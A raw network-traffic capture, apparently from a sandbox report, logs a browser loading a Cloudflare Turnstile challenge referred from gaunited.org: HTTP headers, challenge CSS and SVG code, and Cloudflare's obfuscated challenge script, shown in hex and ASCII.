2024-07-09 18:52:15 UTC	1369	IN	Data Raw: 6e 64 43 68 69 6c 64 28 54 29 3b 76 61 72 20 6d 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 4e 53 28 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 22 6c 69 6e 65 22 29 3b 6d 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 74 72 6f 6b 65 2d 77 69 64 74 68 22 2c 22 33 22 29 2c 6d 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 74 72 6f 6b 65 22 2c 22 23 66 66 66 22 29 2c 6d 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 66 69 6c 6c 22 2c 22 6e 6f 6e 65 22 29 2c 6d 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 78 31 22 2c 22 36 22 29 2c 6d 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 78 32 22 2c 22 31 38 22 29 2c 6d 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 79 31 22 2c 22 31 38 22 29 2c 6d 2e Data Ascii: ndChild(T);var m=document.createElementNS("http://www.w3.org/2000/svg","line");m.setAttribute("stroke-width","3"),m.setAttribute("stroke","#fff"),m.setAttribute("fill","none"),m.setAttribute("x1","6"),m.setAttribute("x2","18"),m.setAttribute("y1","18"),m.

Timestamp	Bytes transferred	Direction	Data
2024-07-09 18:52:15 UTC	791	OUT	GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/a6jpw/0x4AAAAAAAeIDT3Zcm3iJj6N/auto/normal/auto/ HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe Referer: https://gaunited.org/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-09 18:52:16 UTC	1362	IN	HTTP/1.1 200 OK Date: Tue, 09 Jul 2024 18:52:16 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 69636 Connection: close permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 cross-origin-embedder-policy: require-corp cross-origin-opener-policy: same-origin accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self' origin-agent-cluster: ?1 cross-origin-resource-policy: cross-origin referrer-policy: same-origin critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA document-policy: js-profiling
2024-07-09 18:52:16 UTC	82	IN	Data Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 61 30 61 38 32 39 38 37 39 37 30 63 33 32 65 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a Data Ascii: Server: cloudflareCF-RAY: 8a0a82987970c32e-EWRalt-svc: h3=":443"; ma=86400
2024-07-09 18:52:16 UTC	1294	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
2024-07-09 18:52:16 UTC	1369	IN	Data Raw: 30 30 25 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 7d 0a 0a 62 6f 64 79 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 37 70 78 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 64 31 66 32 30 3b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 20 Data Ascii: 00%; height: 100%; overflow: hidden;}body { margin: 0; background-color: #fff; padding: 0; width: 100%; height: 100%; overflow: hidden; line-height: 17px; color: #1d1f20; font-family: -apple-system, system-ui, blinkmacsystemfont,
2024-07-09 18:52:16 UTC	1369	IN	Data Raw: 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 38 70 78 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 0a 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 69 6e 73 65 74 20 30 20 30 20 30 20 23 30 33 38 31 32 37 3b 0a 20 20 77 69 64 74 68 3a 20 33 30 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 33 30 70 78 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 2d 75 70 2d 63 65 6e 74 65 72 20 30 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 35 35 2c 20 30 2e 30 38 35 2c 20 30 2e 36 38 2c 20 30 2e 35 33 29 20 62 6f 74 68 3b 0a 20 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 20 36 70 78 3b 0a 20 20 73 74 72 6f 6b 65 3a 20 23 66 38 66 38 66 38 3b 0a 20 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c Data Ascii: splay: flex; margin-right: 8px; border-radius: 50%; box-shadow: inset 0 0 0 #038127; width: 30px; height: 30px; animation: scale-up-center 0.6s cubic-bezier(0.55, 0.085, 0.68, 0.53) both; stroke-width: 6px; stroke: #f8f8f8; stroke-miterl
2024-07-09 18:52:16 UTC	1369	IN	Data Raw: 65 78 74 20 61 3a 68 6f 76 65 72 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 39 34 39 34 39 34 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 62 2d 6c 62 20 2e 63 62 2d 69 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 32 32 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7e 20 2e 63 62 2d 69 2c 20 2e 74 68 65 6d 65 2d 64 61 72 Data Ascii: ext a:hover,.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus { color: #949494;}.theme-dark .cb-lb .cb-i { border: 2px solid #dadada; background-color: #222;}.theme-dark .cb-lb input:focus ~ .cb-i, .theme-dar
2024-07-09 18:52:16 UTC	1369	IN	Data Raw: 72 3a 20 23 32 32 32 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 71 72 20 7b 0a 20 20 66 69 6c 6c 3a 20 72 67 62 28 32 34 33 2c 20 31 32 38 2c 20 33 32 29 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 20 7b 0a 20 20 66 69 6c 6c 3a 20 23 66 66 66 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 62 62 62 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 2c 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 0a 2e 74 68 65 Data Ascii: r: #222;}.theme-dark #qr { fill: rgb(243, 128, 32);}.theme-dark .logo-text { fill: #fff;}.theme-dark #fr-helper-link,.theme-dark #fr-helper-loop-link { color: #bbb;}.theme-dark #fr-helper-link:visited, .theme-dark #fr-helper-link:link,.the
2024-07-09 18:52:16 UTC	1369	IN	Data Raw: 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 30 70 78 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 64 65 31 33 30 33 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 39 70 78 3b 0a 7d 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 64 31 66 32 30 3b 0a 7d 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 2c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 76 Data Ascii: #challenge-error-text { text-align: center; line-height: 10px; color: #de1303; font-size: 9px;}#challenge-overlay a,#challenge-error-text a { color: #1d1f20;}#challenge-overlay a:visited, #challenge-overlay a:link,#challenge-error-text a:v
2024-07-09 18:52:16 UTC	1369	IN	Data Raw: 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 7d 0a 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7e 20 2e 63 62 2d 69 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 63 34 34 64 30 65 3b 0a 7d 0a 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7e 20 73 70 61 6e 2e 63 62 2d 6c 62 2d 74 20 7b 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 7d 0a 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 20 7e 20 2e 63 62 2d 69 20 7b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 20 73 63 61 6c 65 28 31 29 3b 0a 20 20 6f 70 61 63 69 74 79 3a 20 31 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 70 78 3b 0a 20 20 62 61 63 Data Ascii: tion: underline;}.cb-lb input:focus ~ .cb-i { border: 2px solid #c44d0e;}.cb-lb input:focus ~ span.cb-lb-t { text-decoration: underline;}.cb-lb input:checked ~ .cb-i { transform: rotate(0deg) scale(1); opacity: 1; border-radius: 5px; bac
2024-07-09 18:52:16 UTC	1369	IN	Data Raw: 74 6f 70 3a 20 33 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 30 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 66 6c 65 78 2d 66 6c 6f 77 3a 20 72 6f 77 2d 72 65 76 65 72 73 65 20 77 72 61 70 3b 0a 20 20 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 20 66 6c 65 78 2d 73 74 61 72 74 3b 0a 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 20 31 36 70 78 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72 69 67 68 74 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 74 65 72 6d 73 20 7b 0a 20 20 74 65 Data Ascii: top: 3px; margin-left: 0;}.size-compact #branding { display: flex; flex-flow: row-reverse wrap; place-content: center flex-start; align-items: center; margin: 5px 16px 0; padding-right: 0; text-align: right;}.size-compact #terms { te
2024-07-09 18:52:16 UTC	1369	IN	Data Raw: 65 72 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 20 7b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 74 65 72 6d 73 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 63 66 2d 73 74 61 67 65 20 7b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 34 38 70 78 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 73 75 63 63 65 73 73 2d 69 63 6f 6e 20 7b 0a 20 20 6c 65 66 74 3a 20 38 36 70 78 Data Ascii: er;}.rtl .size-compact #branding { padding-right: 0; padding-left: 0; text-align: center;}.rtl .size-compact #terms { text-align: center;}.rtl .size-compact #cf-stage { padding-right: 48px;}.rtl .size-compact #success-icon { left: 86px

Timestamp	Bytes transferred	Direction	Data
2024-07-09 18:52:16 UTC	726	OUT	GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8a0a82987970c32e&lang=auto HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/a6jpw/0x4AAAAAAAeIDT3Zcm3iJj6N/auto/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-09 18:52:17 UTC	331	IN	HTTP/1.1 200 OK Date: Tue, 09 Jul 2024 18:52:17 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 108044 Connection: close cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Server: cloudflare CF-RAY: 8a0a829eb9b4421c-EWR alt-svc: h3=":443"; ma=86400
2024-07-09 18:52:17 UTC	1038	IN	Data Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 52 74 6e 52 50 31 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.RtnRP1={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"http
2024-07-09 18:52:17 UTC	1369	IN	Data Raw: 25 33 45 59 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 69 73 25 32 30 6f 75 74 25 32 30 6f 66 25 32 30 64 61 74 65 25 32 31 25 33 43 25 32 46 62 25 33 45 25 33 43 62 72 25 32 46 25 33 45 55 70 64 61 74 65 25 32 30 79 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 74 6f 25 32 30 76 69 65 77 25 32 30 74 68 69 73 25 32 30 77 65 62 73 69 74 65 25 32 30 63 6f 72 72 65 63 74 6c 79 2e 25 32 30 25 33 43 61 25 32 30 74 61 72 67 65 74 25 33 44 25 32 32 5f 62 6c 61 6e 6b 25 32 32 25 32 30 72 65 6c 25 33 44 25 32 32 6e 6f 6f 70 65 6e 65 72 25 32 30 6e 6f 72 65 66 65 72 72 65 72 25 32 32 25 32 30 68 72 65 66 25 33 44 25 32 32 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 Data Ascii: %3EYour%20browser%20is%20out%20of%20date%21%3C%2Fb%3E%3Cbr%2F%3EUpdate%20your%20browser%20to%20view%20this%20website%20correctly.%20%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffund
2024-07-09 18:52:17 UTC	1369	IN	Data Raw: 3d 69 5b 67 4a 28 31 31 31 35 29 5d 28 6c 29 7d 29 2c 63 3d 65 4d 5b 67 49 28 33 30 32 29 5d 28 63 29 2c 68 3d 5b 5d 2c 66 3d 2d 31 3b 21 69 73 4e 61 4e 28 6a 3d 63 5b 67 49 28 31 31 31 35 29 5d 28 2b 2b 66 29 29 3b 68 5b 67 49 28 31 33 38 36 29 5d 28 53 74 72 69 6e 67 5b 67 49 28 36 38 33 29 5d 28 28 28 32 35 35 26 6a 29 2d 67 2d 66 25 36 35 35 33 35 2b 36 35 35 33 35 29 25 32 35 35 29 29 29 3b 72 65 74 75 72 6e 20 68 5b 67 49 28 31 34 31 37 29 5d 28 27 27 29 7d 2c 65 50 3d 7b 7d 2c 65 50 5b 67 48 28 31 34 38 39 29 5d 3d 27 6f 27 2c 65 50 5b 67 48 28 38 39 31 29 5d 3d 27 73 27 2c 65 50 5b 67 48 28 39 38 36 29 5d 3d 27 75 27 2c 65 50 5b 67 48 28 33 33 33 29 5d 3d 27 7a 27 2c 65 50 5b 67 48 28 31 30 36 38 29 5d 3d 27 6e 27 2c 65 50 5b 67 48 28 34 37 32 29 Data Ascii: =i[gJ(1115)](l)}),c=eM[gI(302)](c),h=[],f=-1;!isNaN(j=c[gI(1115)](++f));h[gI(1386)](String[gI(683)](((255&j)-g-f%65535+65535)%255)));return h[gI(1417)]('')},eP={},eP[gH(1489)]='o',eP[gH(891)]='s',eP[gH(986)]='u',eP[gH(333)]='z',eP[gH(1068)]='n',eP[gH(472)
2024-07-09 18:52:17 UTC	1369	IN	Data Raw: 6e 20 6f 3d 3d 3d 6e 7d 2c 27 45 68 79 75 64 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 3c 6f 7d 2c 27 7a 47 4d 46 42 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6f 21 3d 3d 6e 7d 2c 27 47 47 54 73 54 27 3a 67 51 28 38 30 31 29 2c 27 48 69 44 7a 50 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 28 6f 29 7d 7d 2c 6a 3d 4f 62 6a 65 63 74 5b 67 51 28 31 34 35 32 29 5d 28 68 29 2c 6b 3d 30 3b 69 5b 67 51 28 31 36 35 36 29 5d 28 6b 2c 6a 5b 67 51 28 31 35 38 36 29 5d 29 3b 6b 2b 2b 29 69 66 28 69 5b 67 51 28 35 31 33 29 5d 28 69 5b 67 51 28 33 39 36 29 5d 2c 69 5b 67 51 28 33 39 36 29 5d 29 29 7b 69 66 28 73 2e 68 5b 30 5e 76 2e 67 5d 3d 78 2c 42 3d 43 5b 67 51 28 33 36 36 29 5d 28 Data Ascii: n o===n},'Ehyud':function(n,o){return n<o},'zGMFB':function(n,o){return o!==n},'GGTsT':gQ(801),'HiDzP':function(n,o){return n(o)}},j=Object[gQ(1452)](h),k=0;i[gQ(1656)](k,j[gQ(1586)]);k++)if(i[gQ(513)](i[gQ(396)],i[gQ(396)])){if(s.h[0^v.g]=x,B=C[gQ(366)](
2024-07-09 18:52:17 UTC	1369	IN	Data Raw: 27 3a 68 35 28 31 35 31 39 29 2c 27 50 48 53 55 4b 27 3a 68 35 28 31 32 39 36 29 2c 27 4b 69 7a 79 52 27 3a 68 35 28 37 33 31 29 2c 27 74 71 6f 5a 67 27 3a 68 35 28 35 33 39 29 2c 27 72 6d 61 52 4c 27 3a 66 75 6e 63 74 69 6f 6e 28 43 2c 44 29 7b 72 65 74 75 72 6e 20 43 2b 44 7d 2c 27 44 79 70 70 41 27 3a 66 75 6e 63 74 69 6f 6e 28 43 2c 44 29 7b 72 65 74 75 72 6e 20 43 2b 44 7d 2c 27 49 55 4f 6c 61 27 3a 66 75 6e 63 74 69 6f 6e 28 43 2c 44 29 7b 72 65 74 75 72 6e 20 43 2b 44 7d 2c 27 49 42 67 59 70 27 3a 68 35 28 31 32 38 32 29 2c 27 67 65 48 62 63 27 3a 68 35 28 31 34 36 36 29 2c 27 71 57 44 72 59 27 3a 68 35 28 36 36 32 29 2c 27 57 77 6e 4c 63 27 3a 68 35 28 34 32 38 29 2c 27 76 77 48 50 64 27 3a 68 35 28 31 35 32 39 29 7d 29 3b 74 72 79 7b 69 66 28 68 Data Ascii: ':h5(1519),'PHSUK':h5(1296),'KizyR':h5(731),'tqoZg':h5(539),'rmaRL':function(C,D){return C+D},'DyppA':function(C,D){return C+D},'IUOla':function(C,D){return C+D},'IBgYp':h5(1282),'geHbc':h5(1466),'qWDrY':h5(662),'WwnLc':h5(428),'vwHPd':h5(1529)});try{if(h
2024-07-09 18:52:17 UTC	1369	IN	Data Raw: 38 29 5d 3d 68 37 28 31 34 31 39 29 2c 69 5b 68 37 28 31 35 31 32 29 5d 3d 68 37 28 33 35 36 29 2c 69 5b 68 37 28 31 33 30 32 29 5d 3d 68 37 28 31 32 30 38 29 2c 69 5b 68 37 28 31 33 39 30 29 5d 3d 68 37 28 31 32 33 34 29 2c 69 5b 68 37 28 33 38 34 29 5d 3d 68 37 28 31 30 30 35 29 2c 69 5b 68 37 28 37 32 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 2b 6f 7d 2c 69 5b 68 37 28 37 31 34 29 5d 3d 68 37 28 35 32 38 29 2c 69 5b 68 37 28 31 34 39 33 29 5d 3d 68 37 28 31 30 31 30 29 2c 69 5b 68 37 28 39 31 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 2b 6f 7d 2c 69 5b 68 37 28 37 35 31 29 5d 3d 68 37 28 35 35 37 29 2c 69 5b 68 37 28 31 32 38 37 29 5d 3d 68 37 28 34 34 34 29 2c 69 5b 68 37 28 35 35 Data Ascii: 8)]=h7(1419),i[h7(1512)]=h7(356),i[h7(1302)]=h7(1208),i[h7(1390)]=h7(1234),i[h7(384)]=h7(1005),i[h7(721)]=function(n,o){return n+o},i[h7(714)]=h7(528),i[h7(1493)]=h7(1010),i[h7(916)]=function(n,o){return n+o},i[h7(751)]=h7(557),i[h7(1287)]=h7(444),i[h7(55
2024-07-09 18:52:17 UTC	1369	IN	Data Raw: 33 28 31 35 36 31 29 5d 2c 69 33 28 31 65 33 29 29 26 26 64 5b 69 33 28 33 36 39 29 5d 28 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 2c 66 7a 29 7d 29 2c 66 42 3d 21 5b 5d 2c 21 66 33 28 67 48 28 38 33 30 29 29 26 26 28 67 30 28 29 2c 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 69 47 2c 64 2c 65 2c 66 2c 67 29 7b 69 47 3d 67 48 2c 64 3d 7b 7d 2c 64 5b 69 47 28 39 38 37 29 5d 3d 69 47 28 31 34 37 34 29 2c 64 5b 69 47 28 31 32 32 31 29 5d 3d 69 47 28 32 38 32 29 2c 65 3d 64 2c 66 3d 65 4d 5b 69 47 28 33 33 37 29 5d 5b 69 47 28 33 36 30 29 5d 7c 7c 31 65 34 2c 67 3d 66 59 28 29 2c 21 65 4d 5b 69 47 28 31 31 35 30 29 5d 26 26 21 66 43 28 29 26 26 21 65 4d 5b 69 47 28 31 31 39 35 29 5d 5b 69 47 28 38 39 37 29 5d 26 26 67 2d 66 58 3e 66 3f 66 69 Data Ascii: 